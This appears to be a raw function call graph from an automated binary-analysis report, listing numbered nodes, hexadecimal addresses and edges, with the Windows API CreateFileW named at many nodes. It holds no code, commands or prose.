45901->45900 45902->45900 45903->45900 45905 6e5bee 45904->45905 45906 6de100 CreateFileW 45905->45906 45907 6e5d9a 45906->45907 45908 6e5a7f 45907->45908 45909 6fbce0 CreateFileW 45907->45909 45910 6e9bc0 CreateFileW 45908->45910 45909->45908 45910->45866 45913 6c4b6a 45911->45913 45912 6ac9c0 CreateFileW 45912->45913 45913->45911 45913->45912 45914 6c4c8a 45913->45914 45915 6c4c50 45913->45915 45918 6acc20 CreateFileW 45914->45918 45916 6c5100 CreateFileW 45915->45916 45917 6c4c85 45916->45917 45917->45914 45920 6c4c9f 45917->45920 45919 6c4eed 45918->45919 45919->45872 45921 6acc20 CreateFileW 45920->45921 45922 6c4d32 45921->45922 45923 6c4de6 45922->45923 45924 6b80e0 CreateFileW 45922->45924 45925 6ac9c0 CreateFileW 45923->45925 45926 6c4d8f 45924->45926 45932 6c4dfb 45925->45932 45927 6d3340 CreateFileW 45926->45927 45928 6c4da5 45927->45928 45929 6d3340 CreateFileW 45928->45929 45930 6c4db6 45929->45930 45931 6d3400 CreateFileW 45930->45931 45933 6c4dc5 45931->45933 45935 6acc20 CreateFileW 45932->45935 45934 6d34e0 CreateFileW 45933->45934 45934->45923 45936 6c4ebe 45935->45936 45936->45872 45947 6ca26f 45937->45947 45938 6ac9c0 CreateFileW 45938->45947 45939 6ca3bd 45942 6ca47e 45939->45942 45944 6ca160 CreateFileW 45939->45944 45940 6cf5e0 CreateFileW 45940->45947 45941 6cdf40 CreateFileW 45941->45947 45945 6acc20 CreateFileW 45942->45945 45943 6acc20 CreateFileW 45943->45947 45944->45942 45958 6ca370 45945->45958 45946 6cab00 CreateFileW 45946->45947 45947->45937 45947->45938 45947->45939 45947->45940 45947->45941 45947->45943 45947->45946 45948 6ca414 45947->45948 45951 6d9780 CreateFileW 45947->45951 45947->45958 45949 6acc20 CreateFileW 45948->45949 45950 6ca425 45949->45950 45950->45878 45951->45947 45952 6ca656 45953 6ca820 CreateFileW 45952->45953 45954 6ca6a5 45953->45954 45955 6ca6f8 45954->45955 45957 6b82a0 CreateFileW 45954->45957 45956 6d3340 CreateFileW 45955->45956 45960 6ca714 45956->45960 45961 6ca6e7 45957->45961 45958->45952 45959 6c47e0 CreateFileW 45958->45959 45966 6ca607 45959->45966 45962 6ca735 45960->45962 45964 6d3340 CreateFileW 45960->45964 45963 6d3340 CreateFileW 45961->45963 45965 6d3400 CreateFileW 45962->45965 45963->45955 45964->45962 45968 6ca745 45965->45968 45966->45952 45967 6be940 CreateFileW 45966->45967 45967->45952 45969 6d34e0 CreateFileW 45968->45969 45970 6ca7b4 45969->45970 45970->45878 45971->45877 45980 6dea6f 45972->45980 45973 6fb7a0 CreateFileW 45973->45980 45974 6ac9c0 CreateFileW 45974->45980 45975 6d9780 CreateFileW 45975->45980 45976 6e99c0 CreateFileW 45976->45980 45977 6fc680 CreateFileW 45977->45980 45978 6acc20 CreateFileW 45978->45980 45979 6ad160 CreateFileW 45979->45980 45980->45972 45980->45973 45980->45974 45980->45975 45980->45976 45980->45977 45980->45978 45980->45979 45981 6e8a60 CreateFileW 45980->45981 45985 6ded08 45980->45985 45981->45980 45982 6bc045 45982->45812 45983 6ac9c0 CreateFileW 45983->45985 45984 6d9780 CreateFileW 45984->45985 45985->45982 45985->45983 45985->45984 45993 6df56a 45986->45993 45987 6ac9c0 CreateFileW 45987->45993 45988 6d9780 CreateFileW 45988->45993 45989 6acc20 CreateFileW 45989->45993 45990 6ad160 CreateFileW 45990->45993 45991 6df8b6 45992 6ac9c0 CreateFileW 45991->45992 45994 6df8c5 45992->45994 45993->45986 45993->45987 45993->45988 45993->45989 45993->45990 45993->45991 45995 6e8a60 CreateFileW 45993->45995 45996 6fc680 CreateFileW 45993->45996 45997 6e0d80 CreateFileW 45993->45997 45998 6acc20 CreateFileW 45994->45998 45995->45993 45996->45993 45997->45993 45999 6bc09f 45998->45999 46001 6de100 CreateFileW 45999->46001 46000->45886 46001->45890 46005 6aefea 46002->46005 46003 6d9780 CreateFileW 46003->46005 46004 6af025 46006 6af0fb 46004->46006 46007 6af036 46004->46007 46005->46002 46005->46003 46005->46004 46008 6b7fe0 CreateFileW 46006->46008 46009 6af06a 46007->46009 46010 6ac9c0 CreateFileW 46007->46010 46011 6af105 46008->46011 46012 6b7fe0 CreateFileW 46009->46012 46016 6af0f6 46009->46016 46010->46009 46011->45894 46013 6af0e5 46012->46013 46015 6af210 46013->46015 46013->46016 46014 6af169 46018 6af1a5 46014->46018 46021 6d3340 CreateFileW 46014->46021 46019 6d9780 CreateFileW 46015->46019 46020 6acc20 CreateFileW 46015->46020 46016->46014 46017 6acc20 CreateFileW 46016->46017 46017->46014 46018->45894 46019->46015 46020->46015 46022 6af190 46021->46022 46023 6d3340 CreateFileW 46022->46023 46023->46018 46051 6d6dc0 46024->46051 46027 6d63be 46032 6ac9c0 CreateFileW 46027->46032 46033 6dbaa0 CreateFileW 46027->46033 46057 6db220 CreateFileW 46027->46057 46058 6db8c0 CreateFileW 46027->46058 46059 6db7e0 CreateFileW 46027->46059 46060 6db280 CreateFileW 46027->46060 46061 6d9780 CreateFileW 46027->46061 46028 6d6391 46054 6d6b40 46028->46054 46032->46027 46033->46027 46038->45782 46040 70c665 46039->46040 46041 70c6c7 46039->46041 46040->46041 46044 70c67a 46040->46044 46042 70c620 CreateFileW 46041->46042 46043 70c6e1 46042->46043 46043->45786 46066 70c620 46044->46066 46047->45790 46048->45780 46049 6ebee0 CreateFileW 46049->45789 46050->45777 46062 6d6a60 46051->46062 46055 6d6a60 CreateFileW 46054->46055 46056 6d63a6 46055->46056 46056->46049 46057->46027 46058->46027 46059->46027 46060->46027 46061->46027 46063 6d6a7c 46062->46063 46064 70c640 CreateFileW 46063->46064 46065 6d6375 46064->46065 46065->46027 46065->46028 46069 70e200 46066->46069 46067 70c62d 46067->45786 46071 70e220 CreateFileW 46069->46071 46071->46067 46082 6b754a 46072->46082 46073 6b7596 46073->45696 46074 6b756b 46088 6b7340 46074->46088 46079 6dbaa0 CreateFileW 46079->46082 46080 6b757f 46080->45696 46081 6db7e0 CreateFileW 46081->46082 46082->46072 46082->46073 46082->46074 46082->46079 46082->46081 46101 6db220 CreateFileW 46082->46101 46102 6db460 CreateFileW 46082->46102 46103 6db280 CreateFileW 46082->46103 46104 6d9780 CreateFileW 46082->46104 46086->45693 46087->45695 46089 6b734a 46088->46089 46089->46088 46090 6b74b4 46089->46090 46105 6b7aa0 46089->46105 46117 6d3400 CreateFileW 46089->46117 46118 6d34e0 CreateFileW 46089->46118 46119 6d3400 CreateFileW 46090->46119 46093 6b74c5 46120 6d34e0 CreateFileW 46093->46120 46095 6b74e8 46121 6c3440 CreateFileW 46095->46121 46098 6b74fe 46100 6f0760 CreateFileW 46098->46100 46100->46080 46101->46082 46102->46082 46103->46082 46104->46082 46108 6b7aaa 46105->46108 46107 6b7abd 46109 6b7ae2 46107->46109 46110 6b7b27 46107->46110 46108->46105 46108->46107 46189 6d9780 CreateFileW 46108->46189 46112 6b7b0c 46109->46112 46113 6b7af2 46109->46113 46135 6c6d60 46110->46135 46122 6d2dc0 46112->46122 46116 6d2dc0 CreateFileW 46113->46116 46115 6b7b0a 46115->46089 46116->46115 46117->46089 46118->46089 46119->46093 46120->46095 46121->46098 46124 6d2dca 46122->46124 46124->46122 46190 6d3280 CreateFileW 46124->46190 46126 6d2dea 46127 6d2e4b 46126->46127 46134 6d2f09 46126->46134 46191 6acc20 CreateFileW 46126->46191 46192 6ac9c0 CreateFileW 46126->46192 46129 6aeee0 CreateFileW 46127->46129 46132 6d2e8d 46127->46132 46129->46132 46131 6d2edb 46194 6acc20 CreateFileW 46131->46194 46193 6d31e0 CreateFileW 46132->46193 46134->46115 46151 6c6d72 46135->46151 46137 6d9780 CreateFileW 46137->46151 46140 6dbaa0 CreateFileW 46140->46151 46141 6c7ea0 CreateFileW 46186 6c706a 46141->46186 46142 6c7949 46144 6c79ba 46142->46144 46226 6d2180 CreateFileW 46142->46226 46143 6db7e0 CreateFileW 46143->46151 46144->46115 46145 6db220 CreateFileW 46145->46186 46149 6cbc20 CreateFileW 46149->46151 46151->46135 46151->46137 46151->46140 46151->46143 46151->46149 46151->46186 46195 6fb9c0 CreateFileW 46151->46195 46227 6d8060 CreateFileW 46151->46227 46228 6db220 CreateFileW 46151->46228 46229 6db460 CreateFileW 46151->46229 46230 6db280 CreateFileW 46151->46230 46153 6d9780 CreateFileW 46153->46186 46154 6dbaa0 CreateFileW 46154->46186 46155 6c74c5 46155->46115 46156 6c7341 46160 70aa40 CreateFileW 46156->46160 46157 6db7e0 CreateFileW 46157->46186 46158 6c75c9 46214 6d3400 CreateFileW 46158->46214 46159 6c730c 46163 6d2dc0 CreateFileW 46159->46163 46165 6c738f 46160->46165 46162 6c7595 46166 6d2dc0 CreateFileW 46162->46166 46167 6c7335 46163->46167 46165->46115 46166->46155 46167->46115 46168 6c75d5 46215 6d34e0 CreateFileW 46168->46215 46169 6c7505 46172 70aa40 CreateFileW 46169->46172 46173 6c7552 46172->46173 46173->46115 46174 6c75fd 46177 6c761b 46174->46177 46178 6c7647 46174->46178 46175 6c749b 46180 6d2dc0 CreateFileW 46175->46180 46176 6c74d6 46181 6d2dc0 CreateFileW 46176->46181 46216 6b80e0 46177->46216 46183 70aa40 CreateFileW 46178->46183 46179 6db460 CreateFileW 46179->46186 46180->46155 46181->46155 46187 6c7645 46183->46187 46184 6db280 CreateFileW 46184->46186 46185 6c76f6 46185->46115 46186->46141 46186->46142 46186->46145 46186->46153 46186->46154 46186->46155 46186->46156 46186->46157 46186->46158 46186->46159 46186->46162 46186->46169 46186->46175 46186->46176 46186->46179 46186->46184 46196 6cbdc0 46186->46196 46211 6da3e0 CreateFileW 46186->46211 46212 6d3400 CreateFileW 46186->46212 46213 6d34e0 CreateFileW 46186->46213 46187->46185 46188 70aa40 CreateFileW 46187->46188 46188->46185 46189->46108 46190->46126 46191->46126 46192->46126 46193->46131 46194->46134 46195->46151 46206 6cbdca 46196->46206 46197 6cc050 46197->46186 46199 6cc031 46242 6acc20 CreateFileW 46199->46242 46202 6cc045 46202->46186 46203 6cc001 46241 6acc20 CreateFileW 46203->46241 46205 6cc026 46205->46186 46206->46196 46206->46197 46206->46199 46206->46203 46207 6cbfce 46206->46207 46231 6cc180 46206->46231 46239 6ac9c0 CreateFileW 46206->46239 46243 6d9780 CreateFileW 46206->46243 46240 6acc20 CreateFileW 46207->46240 46210 6cbff6 46210->46186 46211->46186 46212->46186 46213->46186 46214->46168 46215->46174 46223 6b80ea 46216->46223 46217 6b8145 46217->46187 46218 6d6c40 CreateFileW 46218->46223 46220 6db7e0 CreateFileW 46220->46223 46221 6dbaa0 CreateFileW 46221->46223 46223->46216 46223->46217 46223->46218 46223->46220 46223->46221 46244 6db220 CreateFileW 46223->46244 46245 6db460 CreateFileW 46223->46245 46246 6db280 CreateFileW 46223->46246 46247 6d9780 CreateFileW 46223->46247 46226->46144 46228->46151 46229->46151 46230->46151 46235 6cc18a 46231->46235 46232 6cc19e 46232->46206 46233 6acc20 CreateFileW 46233->46235 46234 6b7fe0 CreateFileW 46234->46235 46235->46231 46235->46232 46235->46233 46235->46234 46236 6cc1e5 46235->46236 46238 6d9780 CreateFileW 46235->46238 46237 6ac9c0 CreateFileW 46236->46237 46237->46232 46238->46235 46239->46206 46240->46210 46241->46205 46242->46202 46243->46206 46244->46223 46245->46223 46246->46223 46247->46223 46248->45584 46249->45584 46250->45584 46251->45584 46252->45584 46253->45584 46254->45584 46255->45584 46256->45584 46257->45584 46258->45584 46259->45584 46260->45556 46261->45557 46262->45565 46263->45569 46264->45571 46265->45610 46266->45612 46267->45613 46268->45584 46269->45584 46270->45604 46271->45605 46272->45596 46273->45572 46274->45578 46275->45584 46276->45577 46277->45581 46278->45626 46279->45626 46280->45633 46281->45632 46282->45626 46283 70a7a0 46284 70a7c0 46283->46284 46287 711660 46284->46287 46286 70a909 46290 6e59e0 46287->46290 46291 6e59e6 46290->46291 46291->46290 46292 70aa40 CreateFileW 46291->46292 46293 6e5a2b 46292->46293 46293->46286 46294 6dcf60 46308 6dcf6a 46294->46308 46308->46294 46314 6dd169 46308->46314 46318 6ad2e0 46308->46318 46333 6a1c40 46308->46333 46339 6d5740 46308->46339 46354 6eb620 46308->46354 46370 6ead80 CreateFileW 46308->46370 46371 6f55c0 CreateFileW 46308->46371 46372 6ea880 CreateFileW 46308->46372 46373 6a53c0 CreateFileW 46308->46373 46374 6dd320 CreateFileW 46308->46374 46375 6f53a0 CreateFileW 46308->46375 46376 701e40 CreateFileW 46308->46376 46377 6ab7c0 CreateFileW 46308->46377 46378 6f33c0 CreateFileW 46308->46378 46379 6bb120 CreateFileW 46308->46379 46380 6f0860 46308->46380 46389 6ac9c0 CreateFileW 46308->46389 46390 6a88c0 CreateFileW 46308->46390 46391 6e6f60 CreateFileW 46308->46391 46393 6d9780 CreateFileW 46308->46393 46392 6acc20 CreateFileW 46314->46392 46317 6dd177 46327 6ad2ea 46318->46327 46319 6db220 CreateFileW 46319->46327 46320 6db7e0 CreateFileW 46320->46327 46321 6ad3ab 46394 6c9460 46321->46394 46323 6db8c0 CreateFileW 46323->46327 46325 6dbaa0 CreateFileW 46325->46327 46327->46318 46327->46319 46327->46320 46327->46321 46327->46323 46327->46325 46328 6d9780 CreateFileW 46327->46328 46329 6db280 CreateFileW 46327->46329 46328->46327 46329->46327 46330 6ad442 46330->46308 46331 6ad3bc 46331->46330 46413 6bafe0 46331->46413 46336 6a1c46 46333->46336 46335 6a1c5d 46530 6a1ca0 CreateFileW 46335->46530 46336->46333 46520 6a21e0 46336->46520 46338 6a1c6c 46338->46308 46351 6d574a 46339->46351 46340 6d6a60 CreateFileW 46340->46351 46342 6d589c 46343 6d6b40 CreateFileW 46342->46343 46345 6d58b1 46343->46345 46548 708ae0 CreateFileW 46345->46548 46347 6d58ef 46549 6d6bc0 46347->46549 46351->46339 46351->46340 46351->46342 46353 6d594b 46351->46353 46546 6ef8a0 CreateFileW 46351->46546 46547 6f4840 CreateFileW 46351->46547 46352 6d5925 46352->46308 46353->46308 46355 6eb62a 46354->46355 46355->46354 46557 6a88c0 CreateFileW 46355->46557 46357 6eb66b 46358 6aec20 CreateFileW 46357->46358 46359 6eb685 46358->46359 46558 705780 CreateFileW 46359->46558 46362 6eb6c5 46559 6eb920 CreateFileW 46362->46559 46363 6eb71e 46560 6eb920 CreateFileW 46363->46560 46365 6eb72f 46561 6a88c0 CreateFileW 46365->46561 46367 6eb75b 46562 707a40 CreateFileW 46367->46562 46369 6eb765 46369->46308 46370->46308 46371->46308 46372->46308 46373->46308 46374->46308 46375->46308 46376->46308 46377->46308 46378->46308 46379->46308 46383 6f086a 46380->46383 46381 6d9780 CreateFileW 46381->46383 46382 6b7fe0 CreateFileW 46382->46383 46383->46380 46383->46381 46383->46382 46384 6f08f1 46383->46384 46385 6ac9c0 CreateFileW 46383->46385 46387 6acc20 CreateFileW 46383->46387 46563 6c9ec0 46383->46563 46569 6cb240 CreateFileW 46383->46569 46384->46308 46385->46383 46387->46383 46389->46308 46390->46308 46391->46308 46392->46317 46393->46308 46395 6c946a 46394->46395 46395->46394 46440 6baec0 CreateFileW 46395->46440 46397 6c949e 46441 6baec0 CreateFileW 46397->46441 46399 6c94c5 46442 6baec0 CreateFileW 46399->46442 46401 6c94e9 46443 6baec0 CreateFileW 46401->46443 46403 6c950d 46444 6baec0 CreateFileW 46403->46444 46405 6c9531 46445 6baec0 CreateFileW 46405->46445 46407 6c9555 46446 6baec0 CreateFileW 46407->46446 46409 6c9579 46425 6cc240 46409->46425 46412 6b6dc0 CreateFileW 46412->46331 46422 6bafea 46413->46422 46414 6baffe 46416 6bb007 46414->46416 46417 6bb057 46414->46417 46418 6aeee0 CreateFileW 46414->46418 46416->46331 46419 6bb087 46417->46419 46476 6c9200 46417->46476 46418->46417 46419->46331 46422->46413 46422->46414 46482 6db220 CreateFileW 46422->46482 46483 6dbaa0 CreateFileW 46422->46483 46484 6db280 CreateFileW 46422->46484 46485 6d9780 CreateFileW 46422->46485 46437 6cc24a 46425->46437 46426 6cc26a 46447 6d2520 46426->46447 46427 6db220 CreateFileW 46427->46437 46429 6cc2b6 46451 6ce720 46429->46451 46431 6db8c0 CreateFileW 46431->46437 46432 6cc2c5 46456 6c5460 46432->46456 46435 6dbaa0 CreateFileW 46435->46437 46436 6db460 CreateFileW 46436->46437 46437->46425 46437->46426 46437->46427 46437->46431 46437->46435 46437->46436 46438 6db280 CreateFileW 46437->46438 46460 6d9780 CreateFileW 46437->46460 46438->46437 46440->46397 46441->46399 46442->46401 46443->46403 46444->46405 46445->46407 46446->46409 46448 6d2526 46447->46448 46448->46447 46449 6aeee0 CreateFileW 46448->46449 46450 6d255a 46449->46450 46450->46429 46454 6ce72a 46451->46454 46452 6ce825 46452->46432 46454->46451 46454->46452 46461 6b85e0 46454->46461 46468 6d9780 CreateFileW 46454->46468 46457 6c546a 46456->46457 46457->46456 46472 6cf100 46457->46472 46459 6ad3b7 46459->46412 46460->46437 46463 6b85ea 46461->46463 46463->46461 46469 6d6cc0 46463->46469 46465 6b8645 46465->46454 46466 6d6cc0 CreateFileW 46467 6b8685 46466->46467 46467->46454 46468->46454 46470 6d6a60 CreateFileW 46469->46470 46471 6b8625 46470->46471 46471->46465 46471->46466 46473 6cf106 46472->46473 46473->46472 46474 6b85e0 CreateFileW 46473->46474 46475 6cf125 46474->46475 46475->46459 46479 6c920a 46476->46479 46478 6c935c 46478->46419 46479->46476 46479->46478 46486 6b7fe0 46479->46486 46491 6b8080 CreateFileW 46479->46491 46492 6d9780 CreateFileW 46479->46492 46482->46422 46483->46422 46484->46422 46485->46422 46493 6d3340 46486->46493 46489 6d6cc0 CreateFileW 46490 6b8045 46489->46490 46490->46479 46491->46479 46492->46479 46494 6d3365 46493->46494 46495 6b7ffb 46494->46495 46512 6db220 CreateFileW 46494->46512 46495->46489 46497 6d3385 46513 6dbaa0 CreateFileW 46497->46513 46499 6d3396 46514 6db7e0 CreateFileW 46499->46514 46501 6d33a5 46515 6dbaa0 CreateFileW 46501->46515 46503 6d33b6 46516 6db8c0 CreateFileW 46503->46516 46505 6d33c5 46517 6db460 CreateFileW 46505->46517 46507 6d33ca 46518 6db280 CreateFileW 46507->46518 46509 6d33cf 46519 6d9780 CreateFileW 46509->46519 46511 6d33e5 46512->46497 46513->46499 46514->46501 46515->46503 46516->46505 46517->46507 46518->46509 46519->46511 46522 6a21ea 46520->46522 46521 6aec20 CreateFileW 46523 6a21fe 46521->46523 46522->46520 46522->46521 46527 6a235b 46523->46527 46531 6ef980 CreateFileW 46523->46531 46528 6a256d 46527->46528 46532 6ef980 CreateFileW 46527->46532 46529 6a277a 46528->46529 46533 6ef980 CreateFileW 46528->46533 46529->46335 46530->46338 46531->46527 46532->46528 46533->46529 46534 6d4f40 46535 6d4f4a 46534->46535 46535->46534 46552 6d6c40 46535->46552 46538 6d505a 46538->46352 46540 6d4fbd 46541 6d5054 46540->46541 46556 708ae0 CreateFileW 46540->46556 46541->46352 46543 6d4ffa 46544 6d6c40 CreateFileW 46543->46544 46545 6d503c 46544->46545 46545->46352 46546->46351 46547->46351 46548->46347 46550 6d6a60 CreateFileW 46549->46550 46551 6d590d 46550->46551 46551->46534 46553 6d6a60 CreateFileW 46552->46553 46554 6d4f85 46553->46554 46554->46538 46555 6d4a80 CreateFileW 46554->46555 46555->46540 46556->46543 46557->46357 46558->46362 46559->46363 46560->46365 46561->46367 46562->46369 46564 6c9ec6 46563->46564 46564->46563 46565 6c9ed2 46564->46565 46570 6d9780 CreateFileW 46564->46570 46566 6ca260 CreateFileW 46565->46566 46568 6c9ed9 46566->46568 46568->46383 46569->46383 46570->46564 46571 6df120 46572 6df133 46571->46572 46577 6df1a0 46572->46577 46576 6df194 46578 6df1aa 46577->46578 46578->46577 46579 6df1c9 46578->46579 46626 6d9780 CreateFileW 46578->46626 46592 6d64e0 46579->46592 46582 6df205 46583 6df21c 46582->46583 46625 6df2a0 CreateFileW 46582->46625 46585 6df23d 46583->46585 46608 6e81e0 46583->46608 46586 6df25e 46585->46586 46587 6e7900 CreateFileW 46585->46587 46588 6e3580 CreateFileW 46586->46588 46587->46586 46589 6df18a 46588->46589 46591 6df2e0 CreateFileW 46589->46591 46591->46576 46596 6d64ef 46592->46596 46595 6d6a60 CreateFileW 46595->46596 46596->46592 46596->46595 46598 6db7e0 CreateFileW 46596->46598 46599 6d6cc0 CreateFileW 46596->46599 46600 6d6c40 CreateFileW 46596->46600 46601 6db460 CreateFileW 46596->46601 46602 6db220 CreateFileW 46596->46602 46603 6d66cc 46596->46603 46604 6dbaa0 CreateFileW 46596->46604 46605 6db920 CreateFileW 46596->46605 46606 6db280 CreateFileW 46596->46606 46607 6d9780 CreateFileW 46596->46607 46627 6d6e40 46596->46627 46630 6ac9c0 CreateFileW 46596->46630 46631 6acc20 CreateFileW 46596->46631 46598->46596 46599->46596 46600->46596 46601->46596 46602->46596 46603->46582 46604->46596 46605->46596 46606->46596 46607->46596 46611 6e81ea 46608->46611 46610 70aa40 CreateFileW 46610->46611 46611->46608 46611->46610 46613 70c640 CreateFileW 46611->46613 46619 6e7d40 CreateFileW 46611->46619 46620 6d5180 CreateFileW 46611->46620 46621 6e3240 CreateFileW 46611->46621 46622 6ac9c0 CreateFileW 46611->46622 46624 6acc20 CreateFileW 46611->46624 46632 6e8780 46611->46632 46645 6e7da0 CreateFileW 46611->46645 46646 6f9ca0 CreateFileW 46611->46646 46647 6ad160 CreateFileW 46611->46647 46648 6d4620 CreateFileW 46611->46648 46649 6c4220 CreateFileW 46611->46649 46650 6bb400 CreateFileW 46611->46650 46651 6e8b80 CreateFileW 46611->46651 46613->46611 46619->46611 46620->46611 46621->46611 46622->46611 46624->46611 46625->46583 46626->46578 46628 6d6a60 CreateFileW 46627->46628 46629 6d6e96 46628->46629 46629->46596 46630->46596 46631->46596 46634 6e878a 46632->46634 46634->46632 46656 6ac9c0 CreateFileW 46634->46656 46635 6e8887 46657 6acc20 CreateFileW 46635->46657 46637 6e8895 46637->46611 46640 6e7d40 CreateFileW 46643 6e87a5 46640->46643 46641 6e0d80 CreateFileW 46641->46643 46643->46635 46643->46640 46643->46641 46652 6e8ae0 46643->46652 46658 6acc20 CreateFileW 46643->46658 46659 6fc680 CreateFileW 46643->46659 46660 6ac9c0 CreateFileW 46643->46660 46645->46611 46646->46611 46647->46611 46648->46611 46649->46611 46650->46611 46651->46611 46654 6e8ae6 46652->46654 46653 6e8b35 46653->46643 46654->46652 46654->46653 46661 6d7160 46654->46661 46656->46643 46657->46637 46658->46643 46659->46643 46660->46643 46669 6d7172 46661->46669 46662 6d9780 CreateFileW 46662->46669 46663 6d7585 46663->46653 46665 6d71d7 46701 6acc20 CreateFileW 46665->46701 46667 6d6e40 CreateFileW 46667->46669 46668 6d71e6 46668->46653 46669->46661 46669->46662 46669->46663 46669->46665 46669->46667 46670 6d7286 46669->46670 46700 6ac9c0 CreateFileW 46669->46700 46707 6db220 CreateFileW 46669->46707 46708 6dbaa0 CreateFileW 46669->46708 46709 6db7e0 CreateFileW 46669->46709 46710 6db460 CreateFileW 46669->46710 46711 6db280 CreateFileW 46669->46711 46702 6acc20 CreateFileW 46670->46702 46672 6d7295 46703 6ac9c0 CreateFileW 46672->46703 46675 6d72d0 46676 6d6b40 CreateFileW 46675->46676 46678 6d72ed 46676->46678 46679 6d730d 46678->46679 46680 6d7521 46678->46680 46682 6d6bc0 CreateFileW 46679->46682 46706 6acc20 CreateFileW 46680->46706 46684 6d7337 46682->46684 46704 6acc20 CreateFileW 46684->46704 46686 6d752f 46688 6d6b40 CreateFileW 46686->46688 46690 6d754c 46688->46690 46690->46653 46691 6d7485 46694 6d6b40 CreateFileW 46691->46694 46692 6d7357 46692->46691 46705 6dad60 CreateFileW 46692->46705 46696 6d74d2 46694->46696 46695 6d742d 46695->46691 46698 6d6bc0 CreateFileW 46695->46698 46697 6d6b40 CreateFileW 46696->46697 46699 6d7505 46697->46699 46698->46691 46699->46653 46700->46669 46701->46668 46702->46672 46703->46675 46704->46692 46705->46695 46706->46686 46707->46669 46708->46669 46709->46669 46710->46669 46711->46669 46712 6d55a0 46713 6d55aa 46712->46713 46713->46712 46734 6d4be0 46713->46734 46723 6d55f6 46764 6d4b40 46723->46764 46727 6d560a 46786 6d5080 46727->46786 46729 6d560f 46730 6d6b40 CreateFileW 46729->46730 46731 6d5645 46730->46731 46732 6d6bc0 CreateFileW 46731->46732 46733 6d5685 46732->46733 46737 6d4bea 46734->46737 46735 6d6c40 CreateFileW 46735->46737 46736 6d4a80 CreateFileW 46736->46737 46737->46734 46737->46735 46737->46736 46738 6d4eb0 46737->46738 46739 6d9780 CreateFileW 46737->46739 46740 6ee720 46738->46740 46739->46737 46741 6ee72a 46740->46741 46741->46740 46742 6d6a60 CreateFileW 46741->46742 46743 6ee74a 46742->46743 46744 6d6b40 CreateFileW 46743->46744 46745 6ee765 46744->46745 46746 6d6bc0 CreateFileW 46745->46746 46747 6ee7a5 46746->46747 46748 6d6b40 CreateFileW 46747->46748 46749 6d55e5 46748->46749 46750 6ee880 46749->46750 46751 6ee88a 46750->46751 46751->46750 46752 6d6bc0 CreateFileW 46751->46752 46753 6ee8b7 46752->46753 46754 6d6bc0 CreateFileW 46753->46754 46755 6ee8ee 46754->46755 46756 6d6bc0 CreateFileW 46755->46756 46757 6d55ea 46756->46757 46758 6d5240 46757->46758 46759 6d524a 46758->46759 46759->46758 46760 6d6cc0 CreateFileW 46759->46760 46762 6d527b 46760->46762 46761 6d52b3 46793 6d5180 CreateFileW 46761->46793 46762->46761 46763 6d6b40 CreateFileW 46762->46763 46763->46761 46766 6d4b4a 46764->46766 46765 6d6bc0 CreateFileW 46765->46766 46766->46764 46766->46765 46767 6d4b9b 46766->46767 46794 6d9780 CreateFileW 46766->46794 46769 6d52e0 46767->46769 46770 6d52ea 46769->46770 46770->46769 46771 6d6c40 CreateFileW 46770->46771 46772 6d540e 46770->46772 46773 6d6a60 CreateFileW 46770->46773 46776 6d54b9 46770->46776 46795 6d56c0 CreateFileW 46770->46795 46796 6eaa20 CreateFileW 46770->46796 46771->46770 46772->46727 46773->46770 46777 6d6e40 CreateFileW 46776->46777 46779 6d54f3 46777->46779 46778 6d5550 46778->46727 46779->46778 46797 6db220 CreateFileW 46779->46797 46781 6d5533 46798 6dbaa0 CreateFileW 46781->46798 46783 6d5545 46799 6db280 CreateFileW 46783->46799 46785 6d554a 46785->46727 46787 6d508a 46786->46787 46787->46786 46788 6d6c40 CreateFileW 46787->46788 46791 6d50d1 46788->46791 46789 6d6b40 CreateFileW 46790 6d511d 46789->46790 46790->46729 46791->46789 46792 6d516b 46791->46792 46792->46729 46793->46723 46794->46766 46795->46770 46796->46770 46797->46781 46798->46783 46799->46785 46800 6e86a0 46802 6e86aa 46800->46802 46801 6e8707 46803 6d6bc0 CreateFileW 46801->46803 46802->46800 46802->46801 46804 6d6dc0 CreateFileW 46802->46804 46805 6e875a 46803->46805 46804->46801 46806 6f1980 46841 6f1992 46806->46841 46807 6d9780 CreateFileW 46807->46841 46809 6f1d06 46811 6f1d1b 46809->46811 46851 6f2640 46809->46851 46810 6f1d51 46817 6f1d8f 46810->46817 46877 6f6de0 CreateFileW 46810->46877 46815 6f1d3e 46811->46815 46875 6e4040 CreateFileW 46811->46875 46813 6f1e62 46839 6f1eaa 46813->46839 46880 6db220 CreateFileW 46813->46880 46876 6e3c40 CreateFileW 46815->46876 46817->46813 46818 6f1ded 46817->46818 46878 6de100 CreateFileW 46818->46878 46822 6f1e74 46881 6dbaa0 CreateFileW 46822->46881 46823 6f1e09 46858 6f1540 46823->46858 46827 6f1e85 46882 6db7e0 CreateFileW 46827->46882 46832 6f1e32 46833 6f1e91 46883 6dbaa0 CreateFileW 46833->46883 46834 6dba20 CreateFileW 46834->46841 46836 6f1ea5 46884 6db280 CreateFileW 46836->46884 46837 6db280 CreateFileW 46837->46839 46839->46837 46840 6db220 CreateFileW 46839->46840 46845 6db920 CreateFileW 46839->46845 46846 6dbaa0 CreateFileW 46839->46846 46885 6d9780 CreateFileW 46839->46885 46886 6db7e0 CreateFileW 46839->46886 46840->46839 46841->46806 46841->46807 46841->46809 46841->46810 46841->46834 46842 6db460 CreateFileW 46841->46842 46843 6db220 CreateFileW 46841->46843 46844 6db920 CreateFileW 46841->46844 46847 6db280 CreateFileW 46841->46847 46848 6dbaa0 CreateFileW 46841->46848 46850 6ff040 CreateFileW 46841->46850 46887 6db7e0 CreateFileW 46841->46887 46888 6f5e00 CreateFileW 46841->46888 46842->46841 46843->46841 46844->46841 46845->46839 46846->46839 46847->46841 46848->46841 46850->46841 46853 6f264a 46851->46853 46852 6d9780 CreateFileW 46852->46853 46853->46851 46853->46852 46855 6f26dd 46853->46855 46854 6f2705 46854->46811 46855->46854 46856 6f1540 CreateFileW 46855->46856 46857 6f2753 46856->46857 46857->46811 46859 6f154f 46858->46859 46859->46858 46860 6f1572 46859->46860 46861 6d9780 CreateFileW 46859->46861 46862 6f0860 CreateFileW 46860->46862 46861->46859 46863 6f1625 46862->46863 46865 6f169a 46863->46865 46867 6f16cd 46863->46867 46893 6d9780 CreateFileW 46863->46893 46894 6f13e0 CreateFileW 46865->46894 46889 6fd600 CreateFileW 46867->46889 46871 6f1816 46873 6f183c 46871->46873 46890 6f1040 CreateFileW 46871->46890 46891 6fdc40 CreateFileW 46871->46891 46872 6f1871 46879 6de100 CreateFileW 46872->46879 46892 6f0b40 CreateFileW 46873->46892 46875->46815 46876->46810 46877->46817 46878->46823 46879->46832 46880->46822 46881->46827 46882->46833 46883->46836 46884->46839 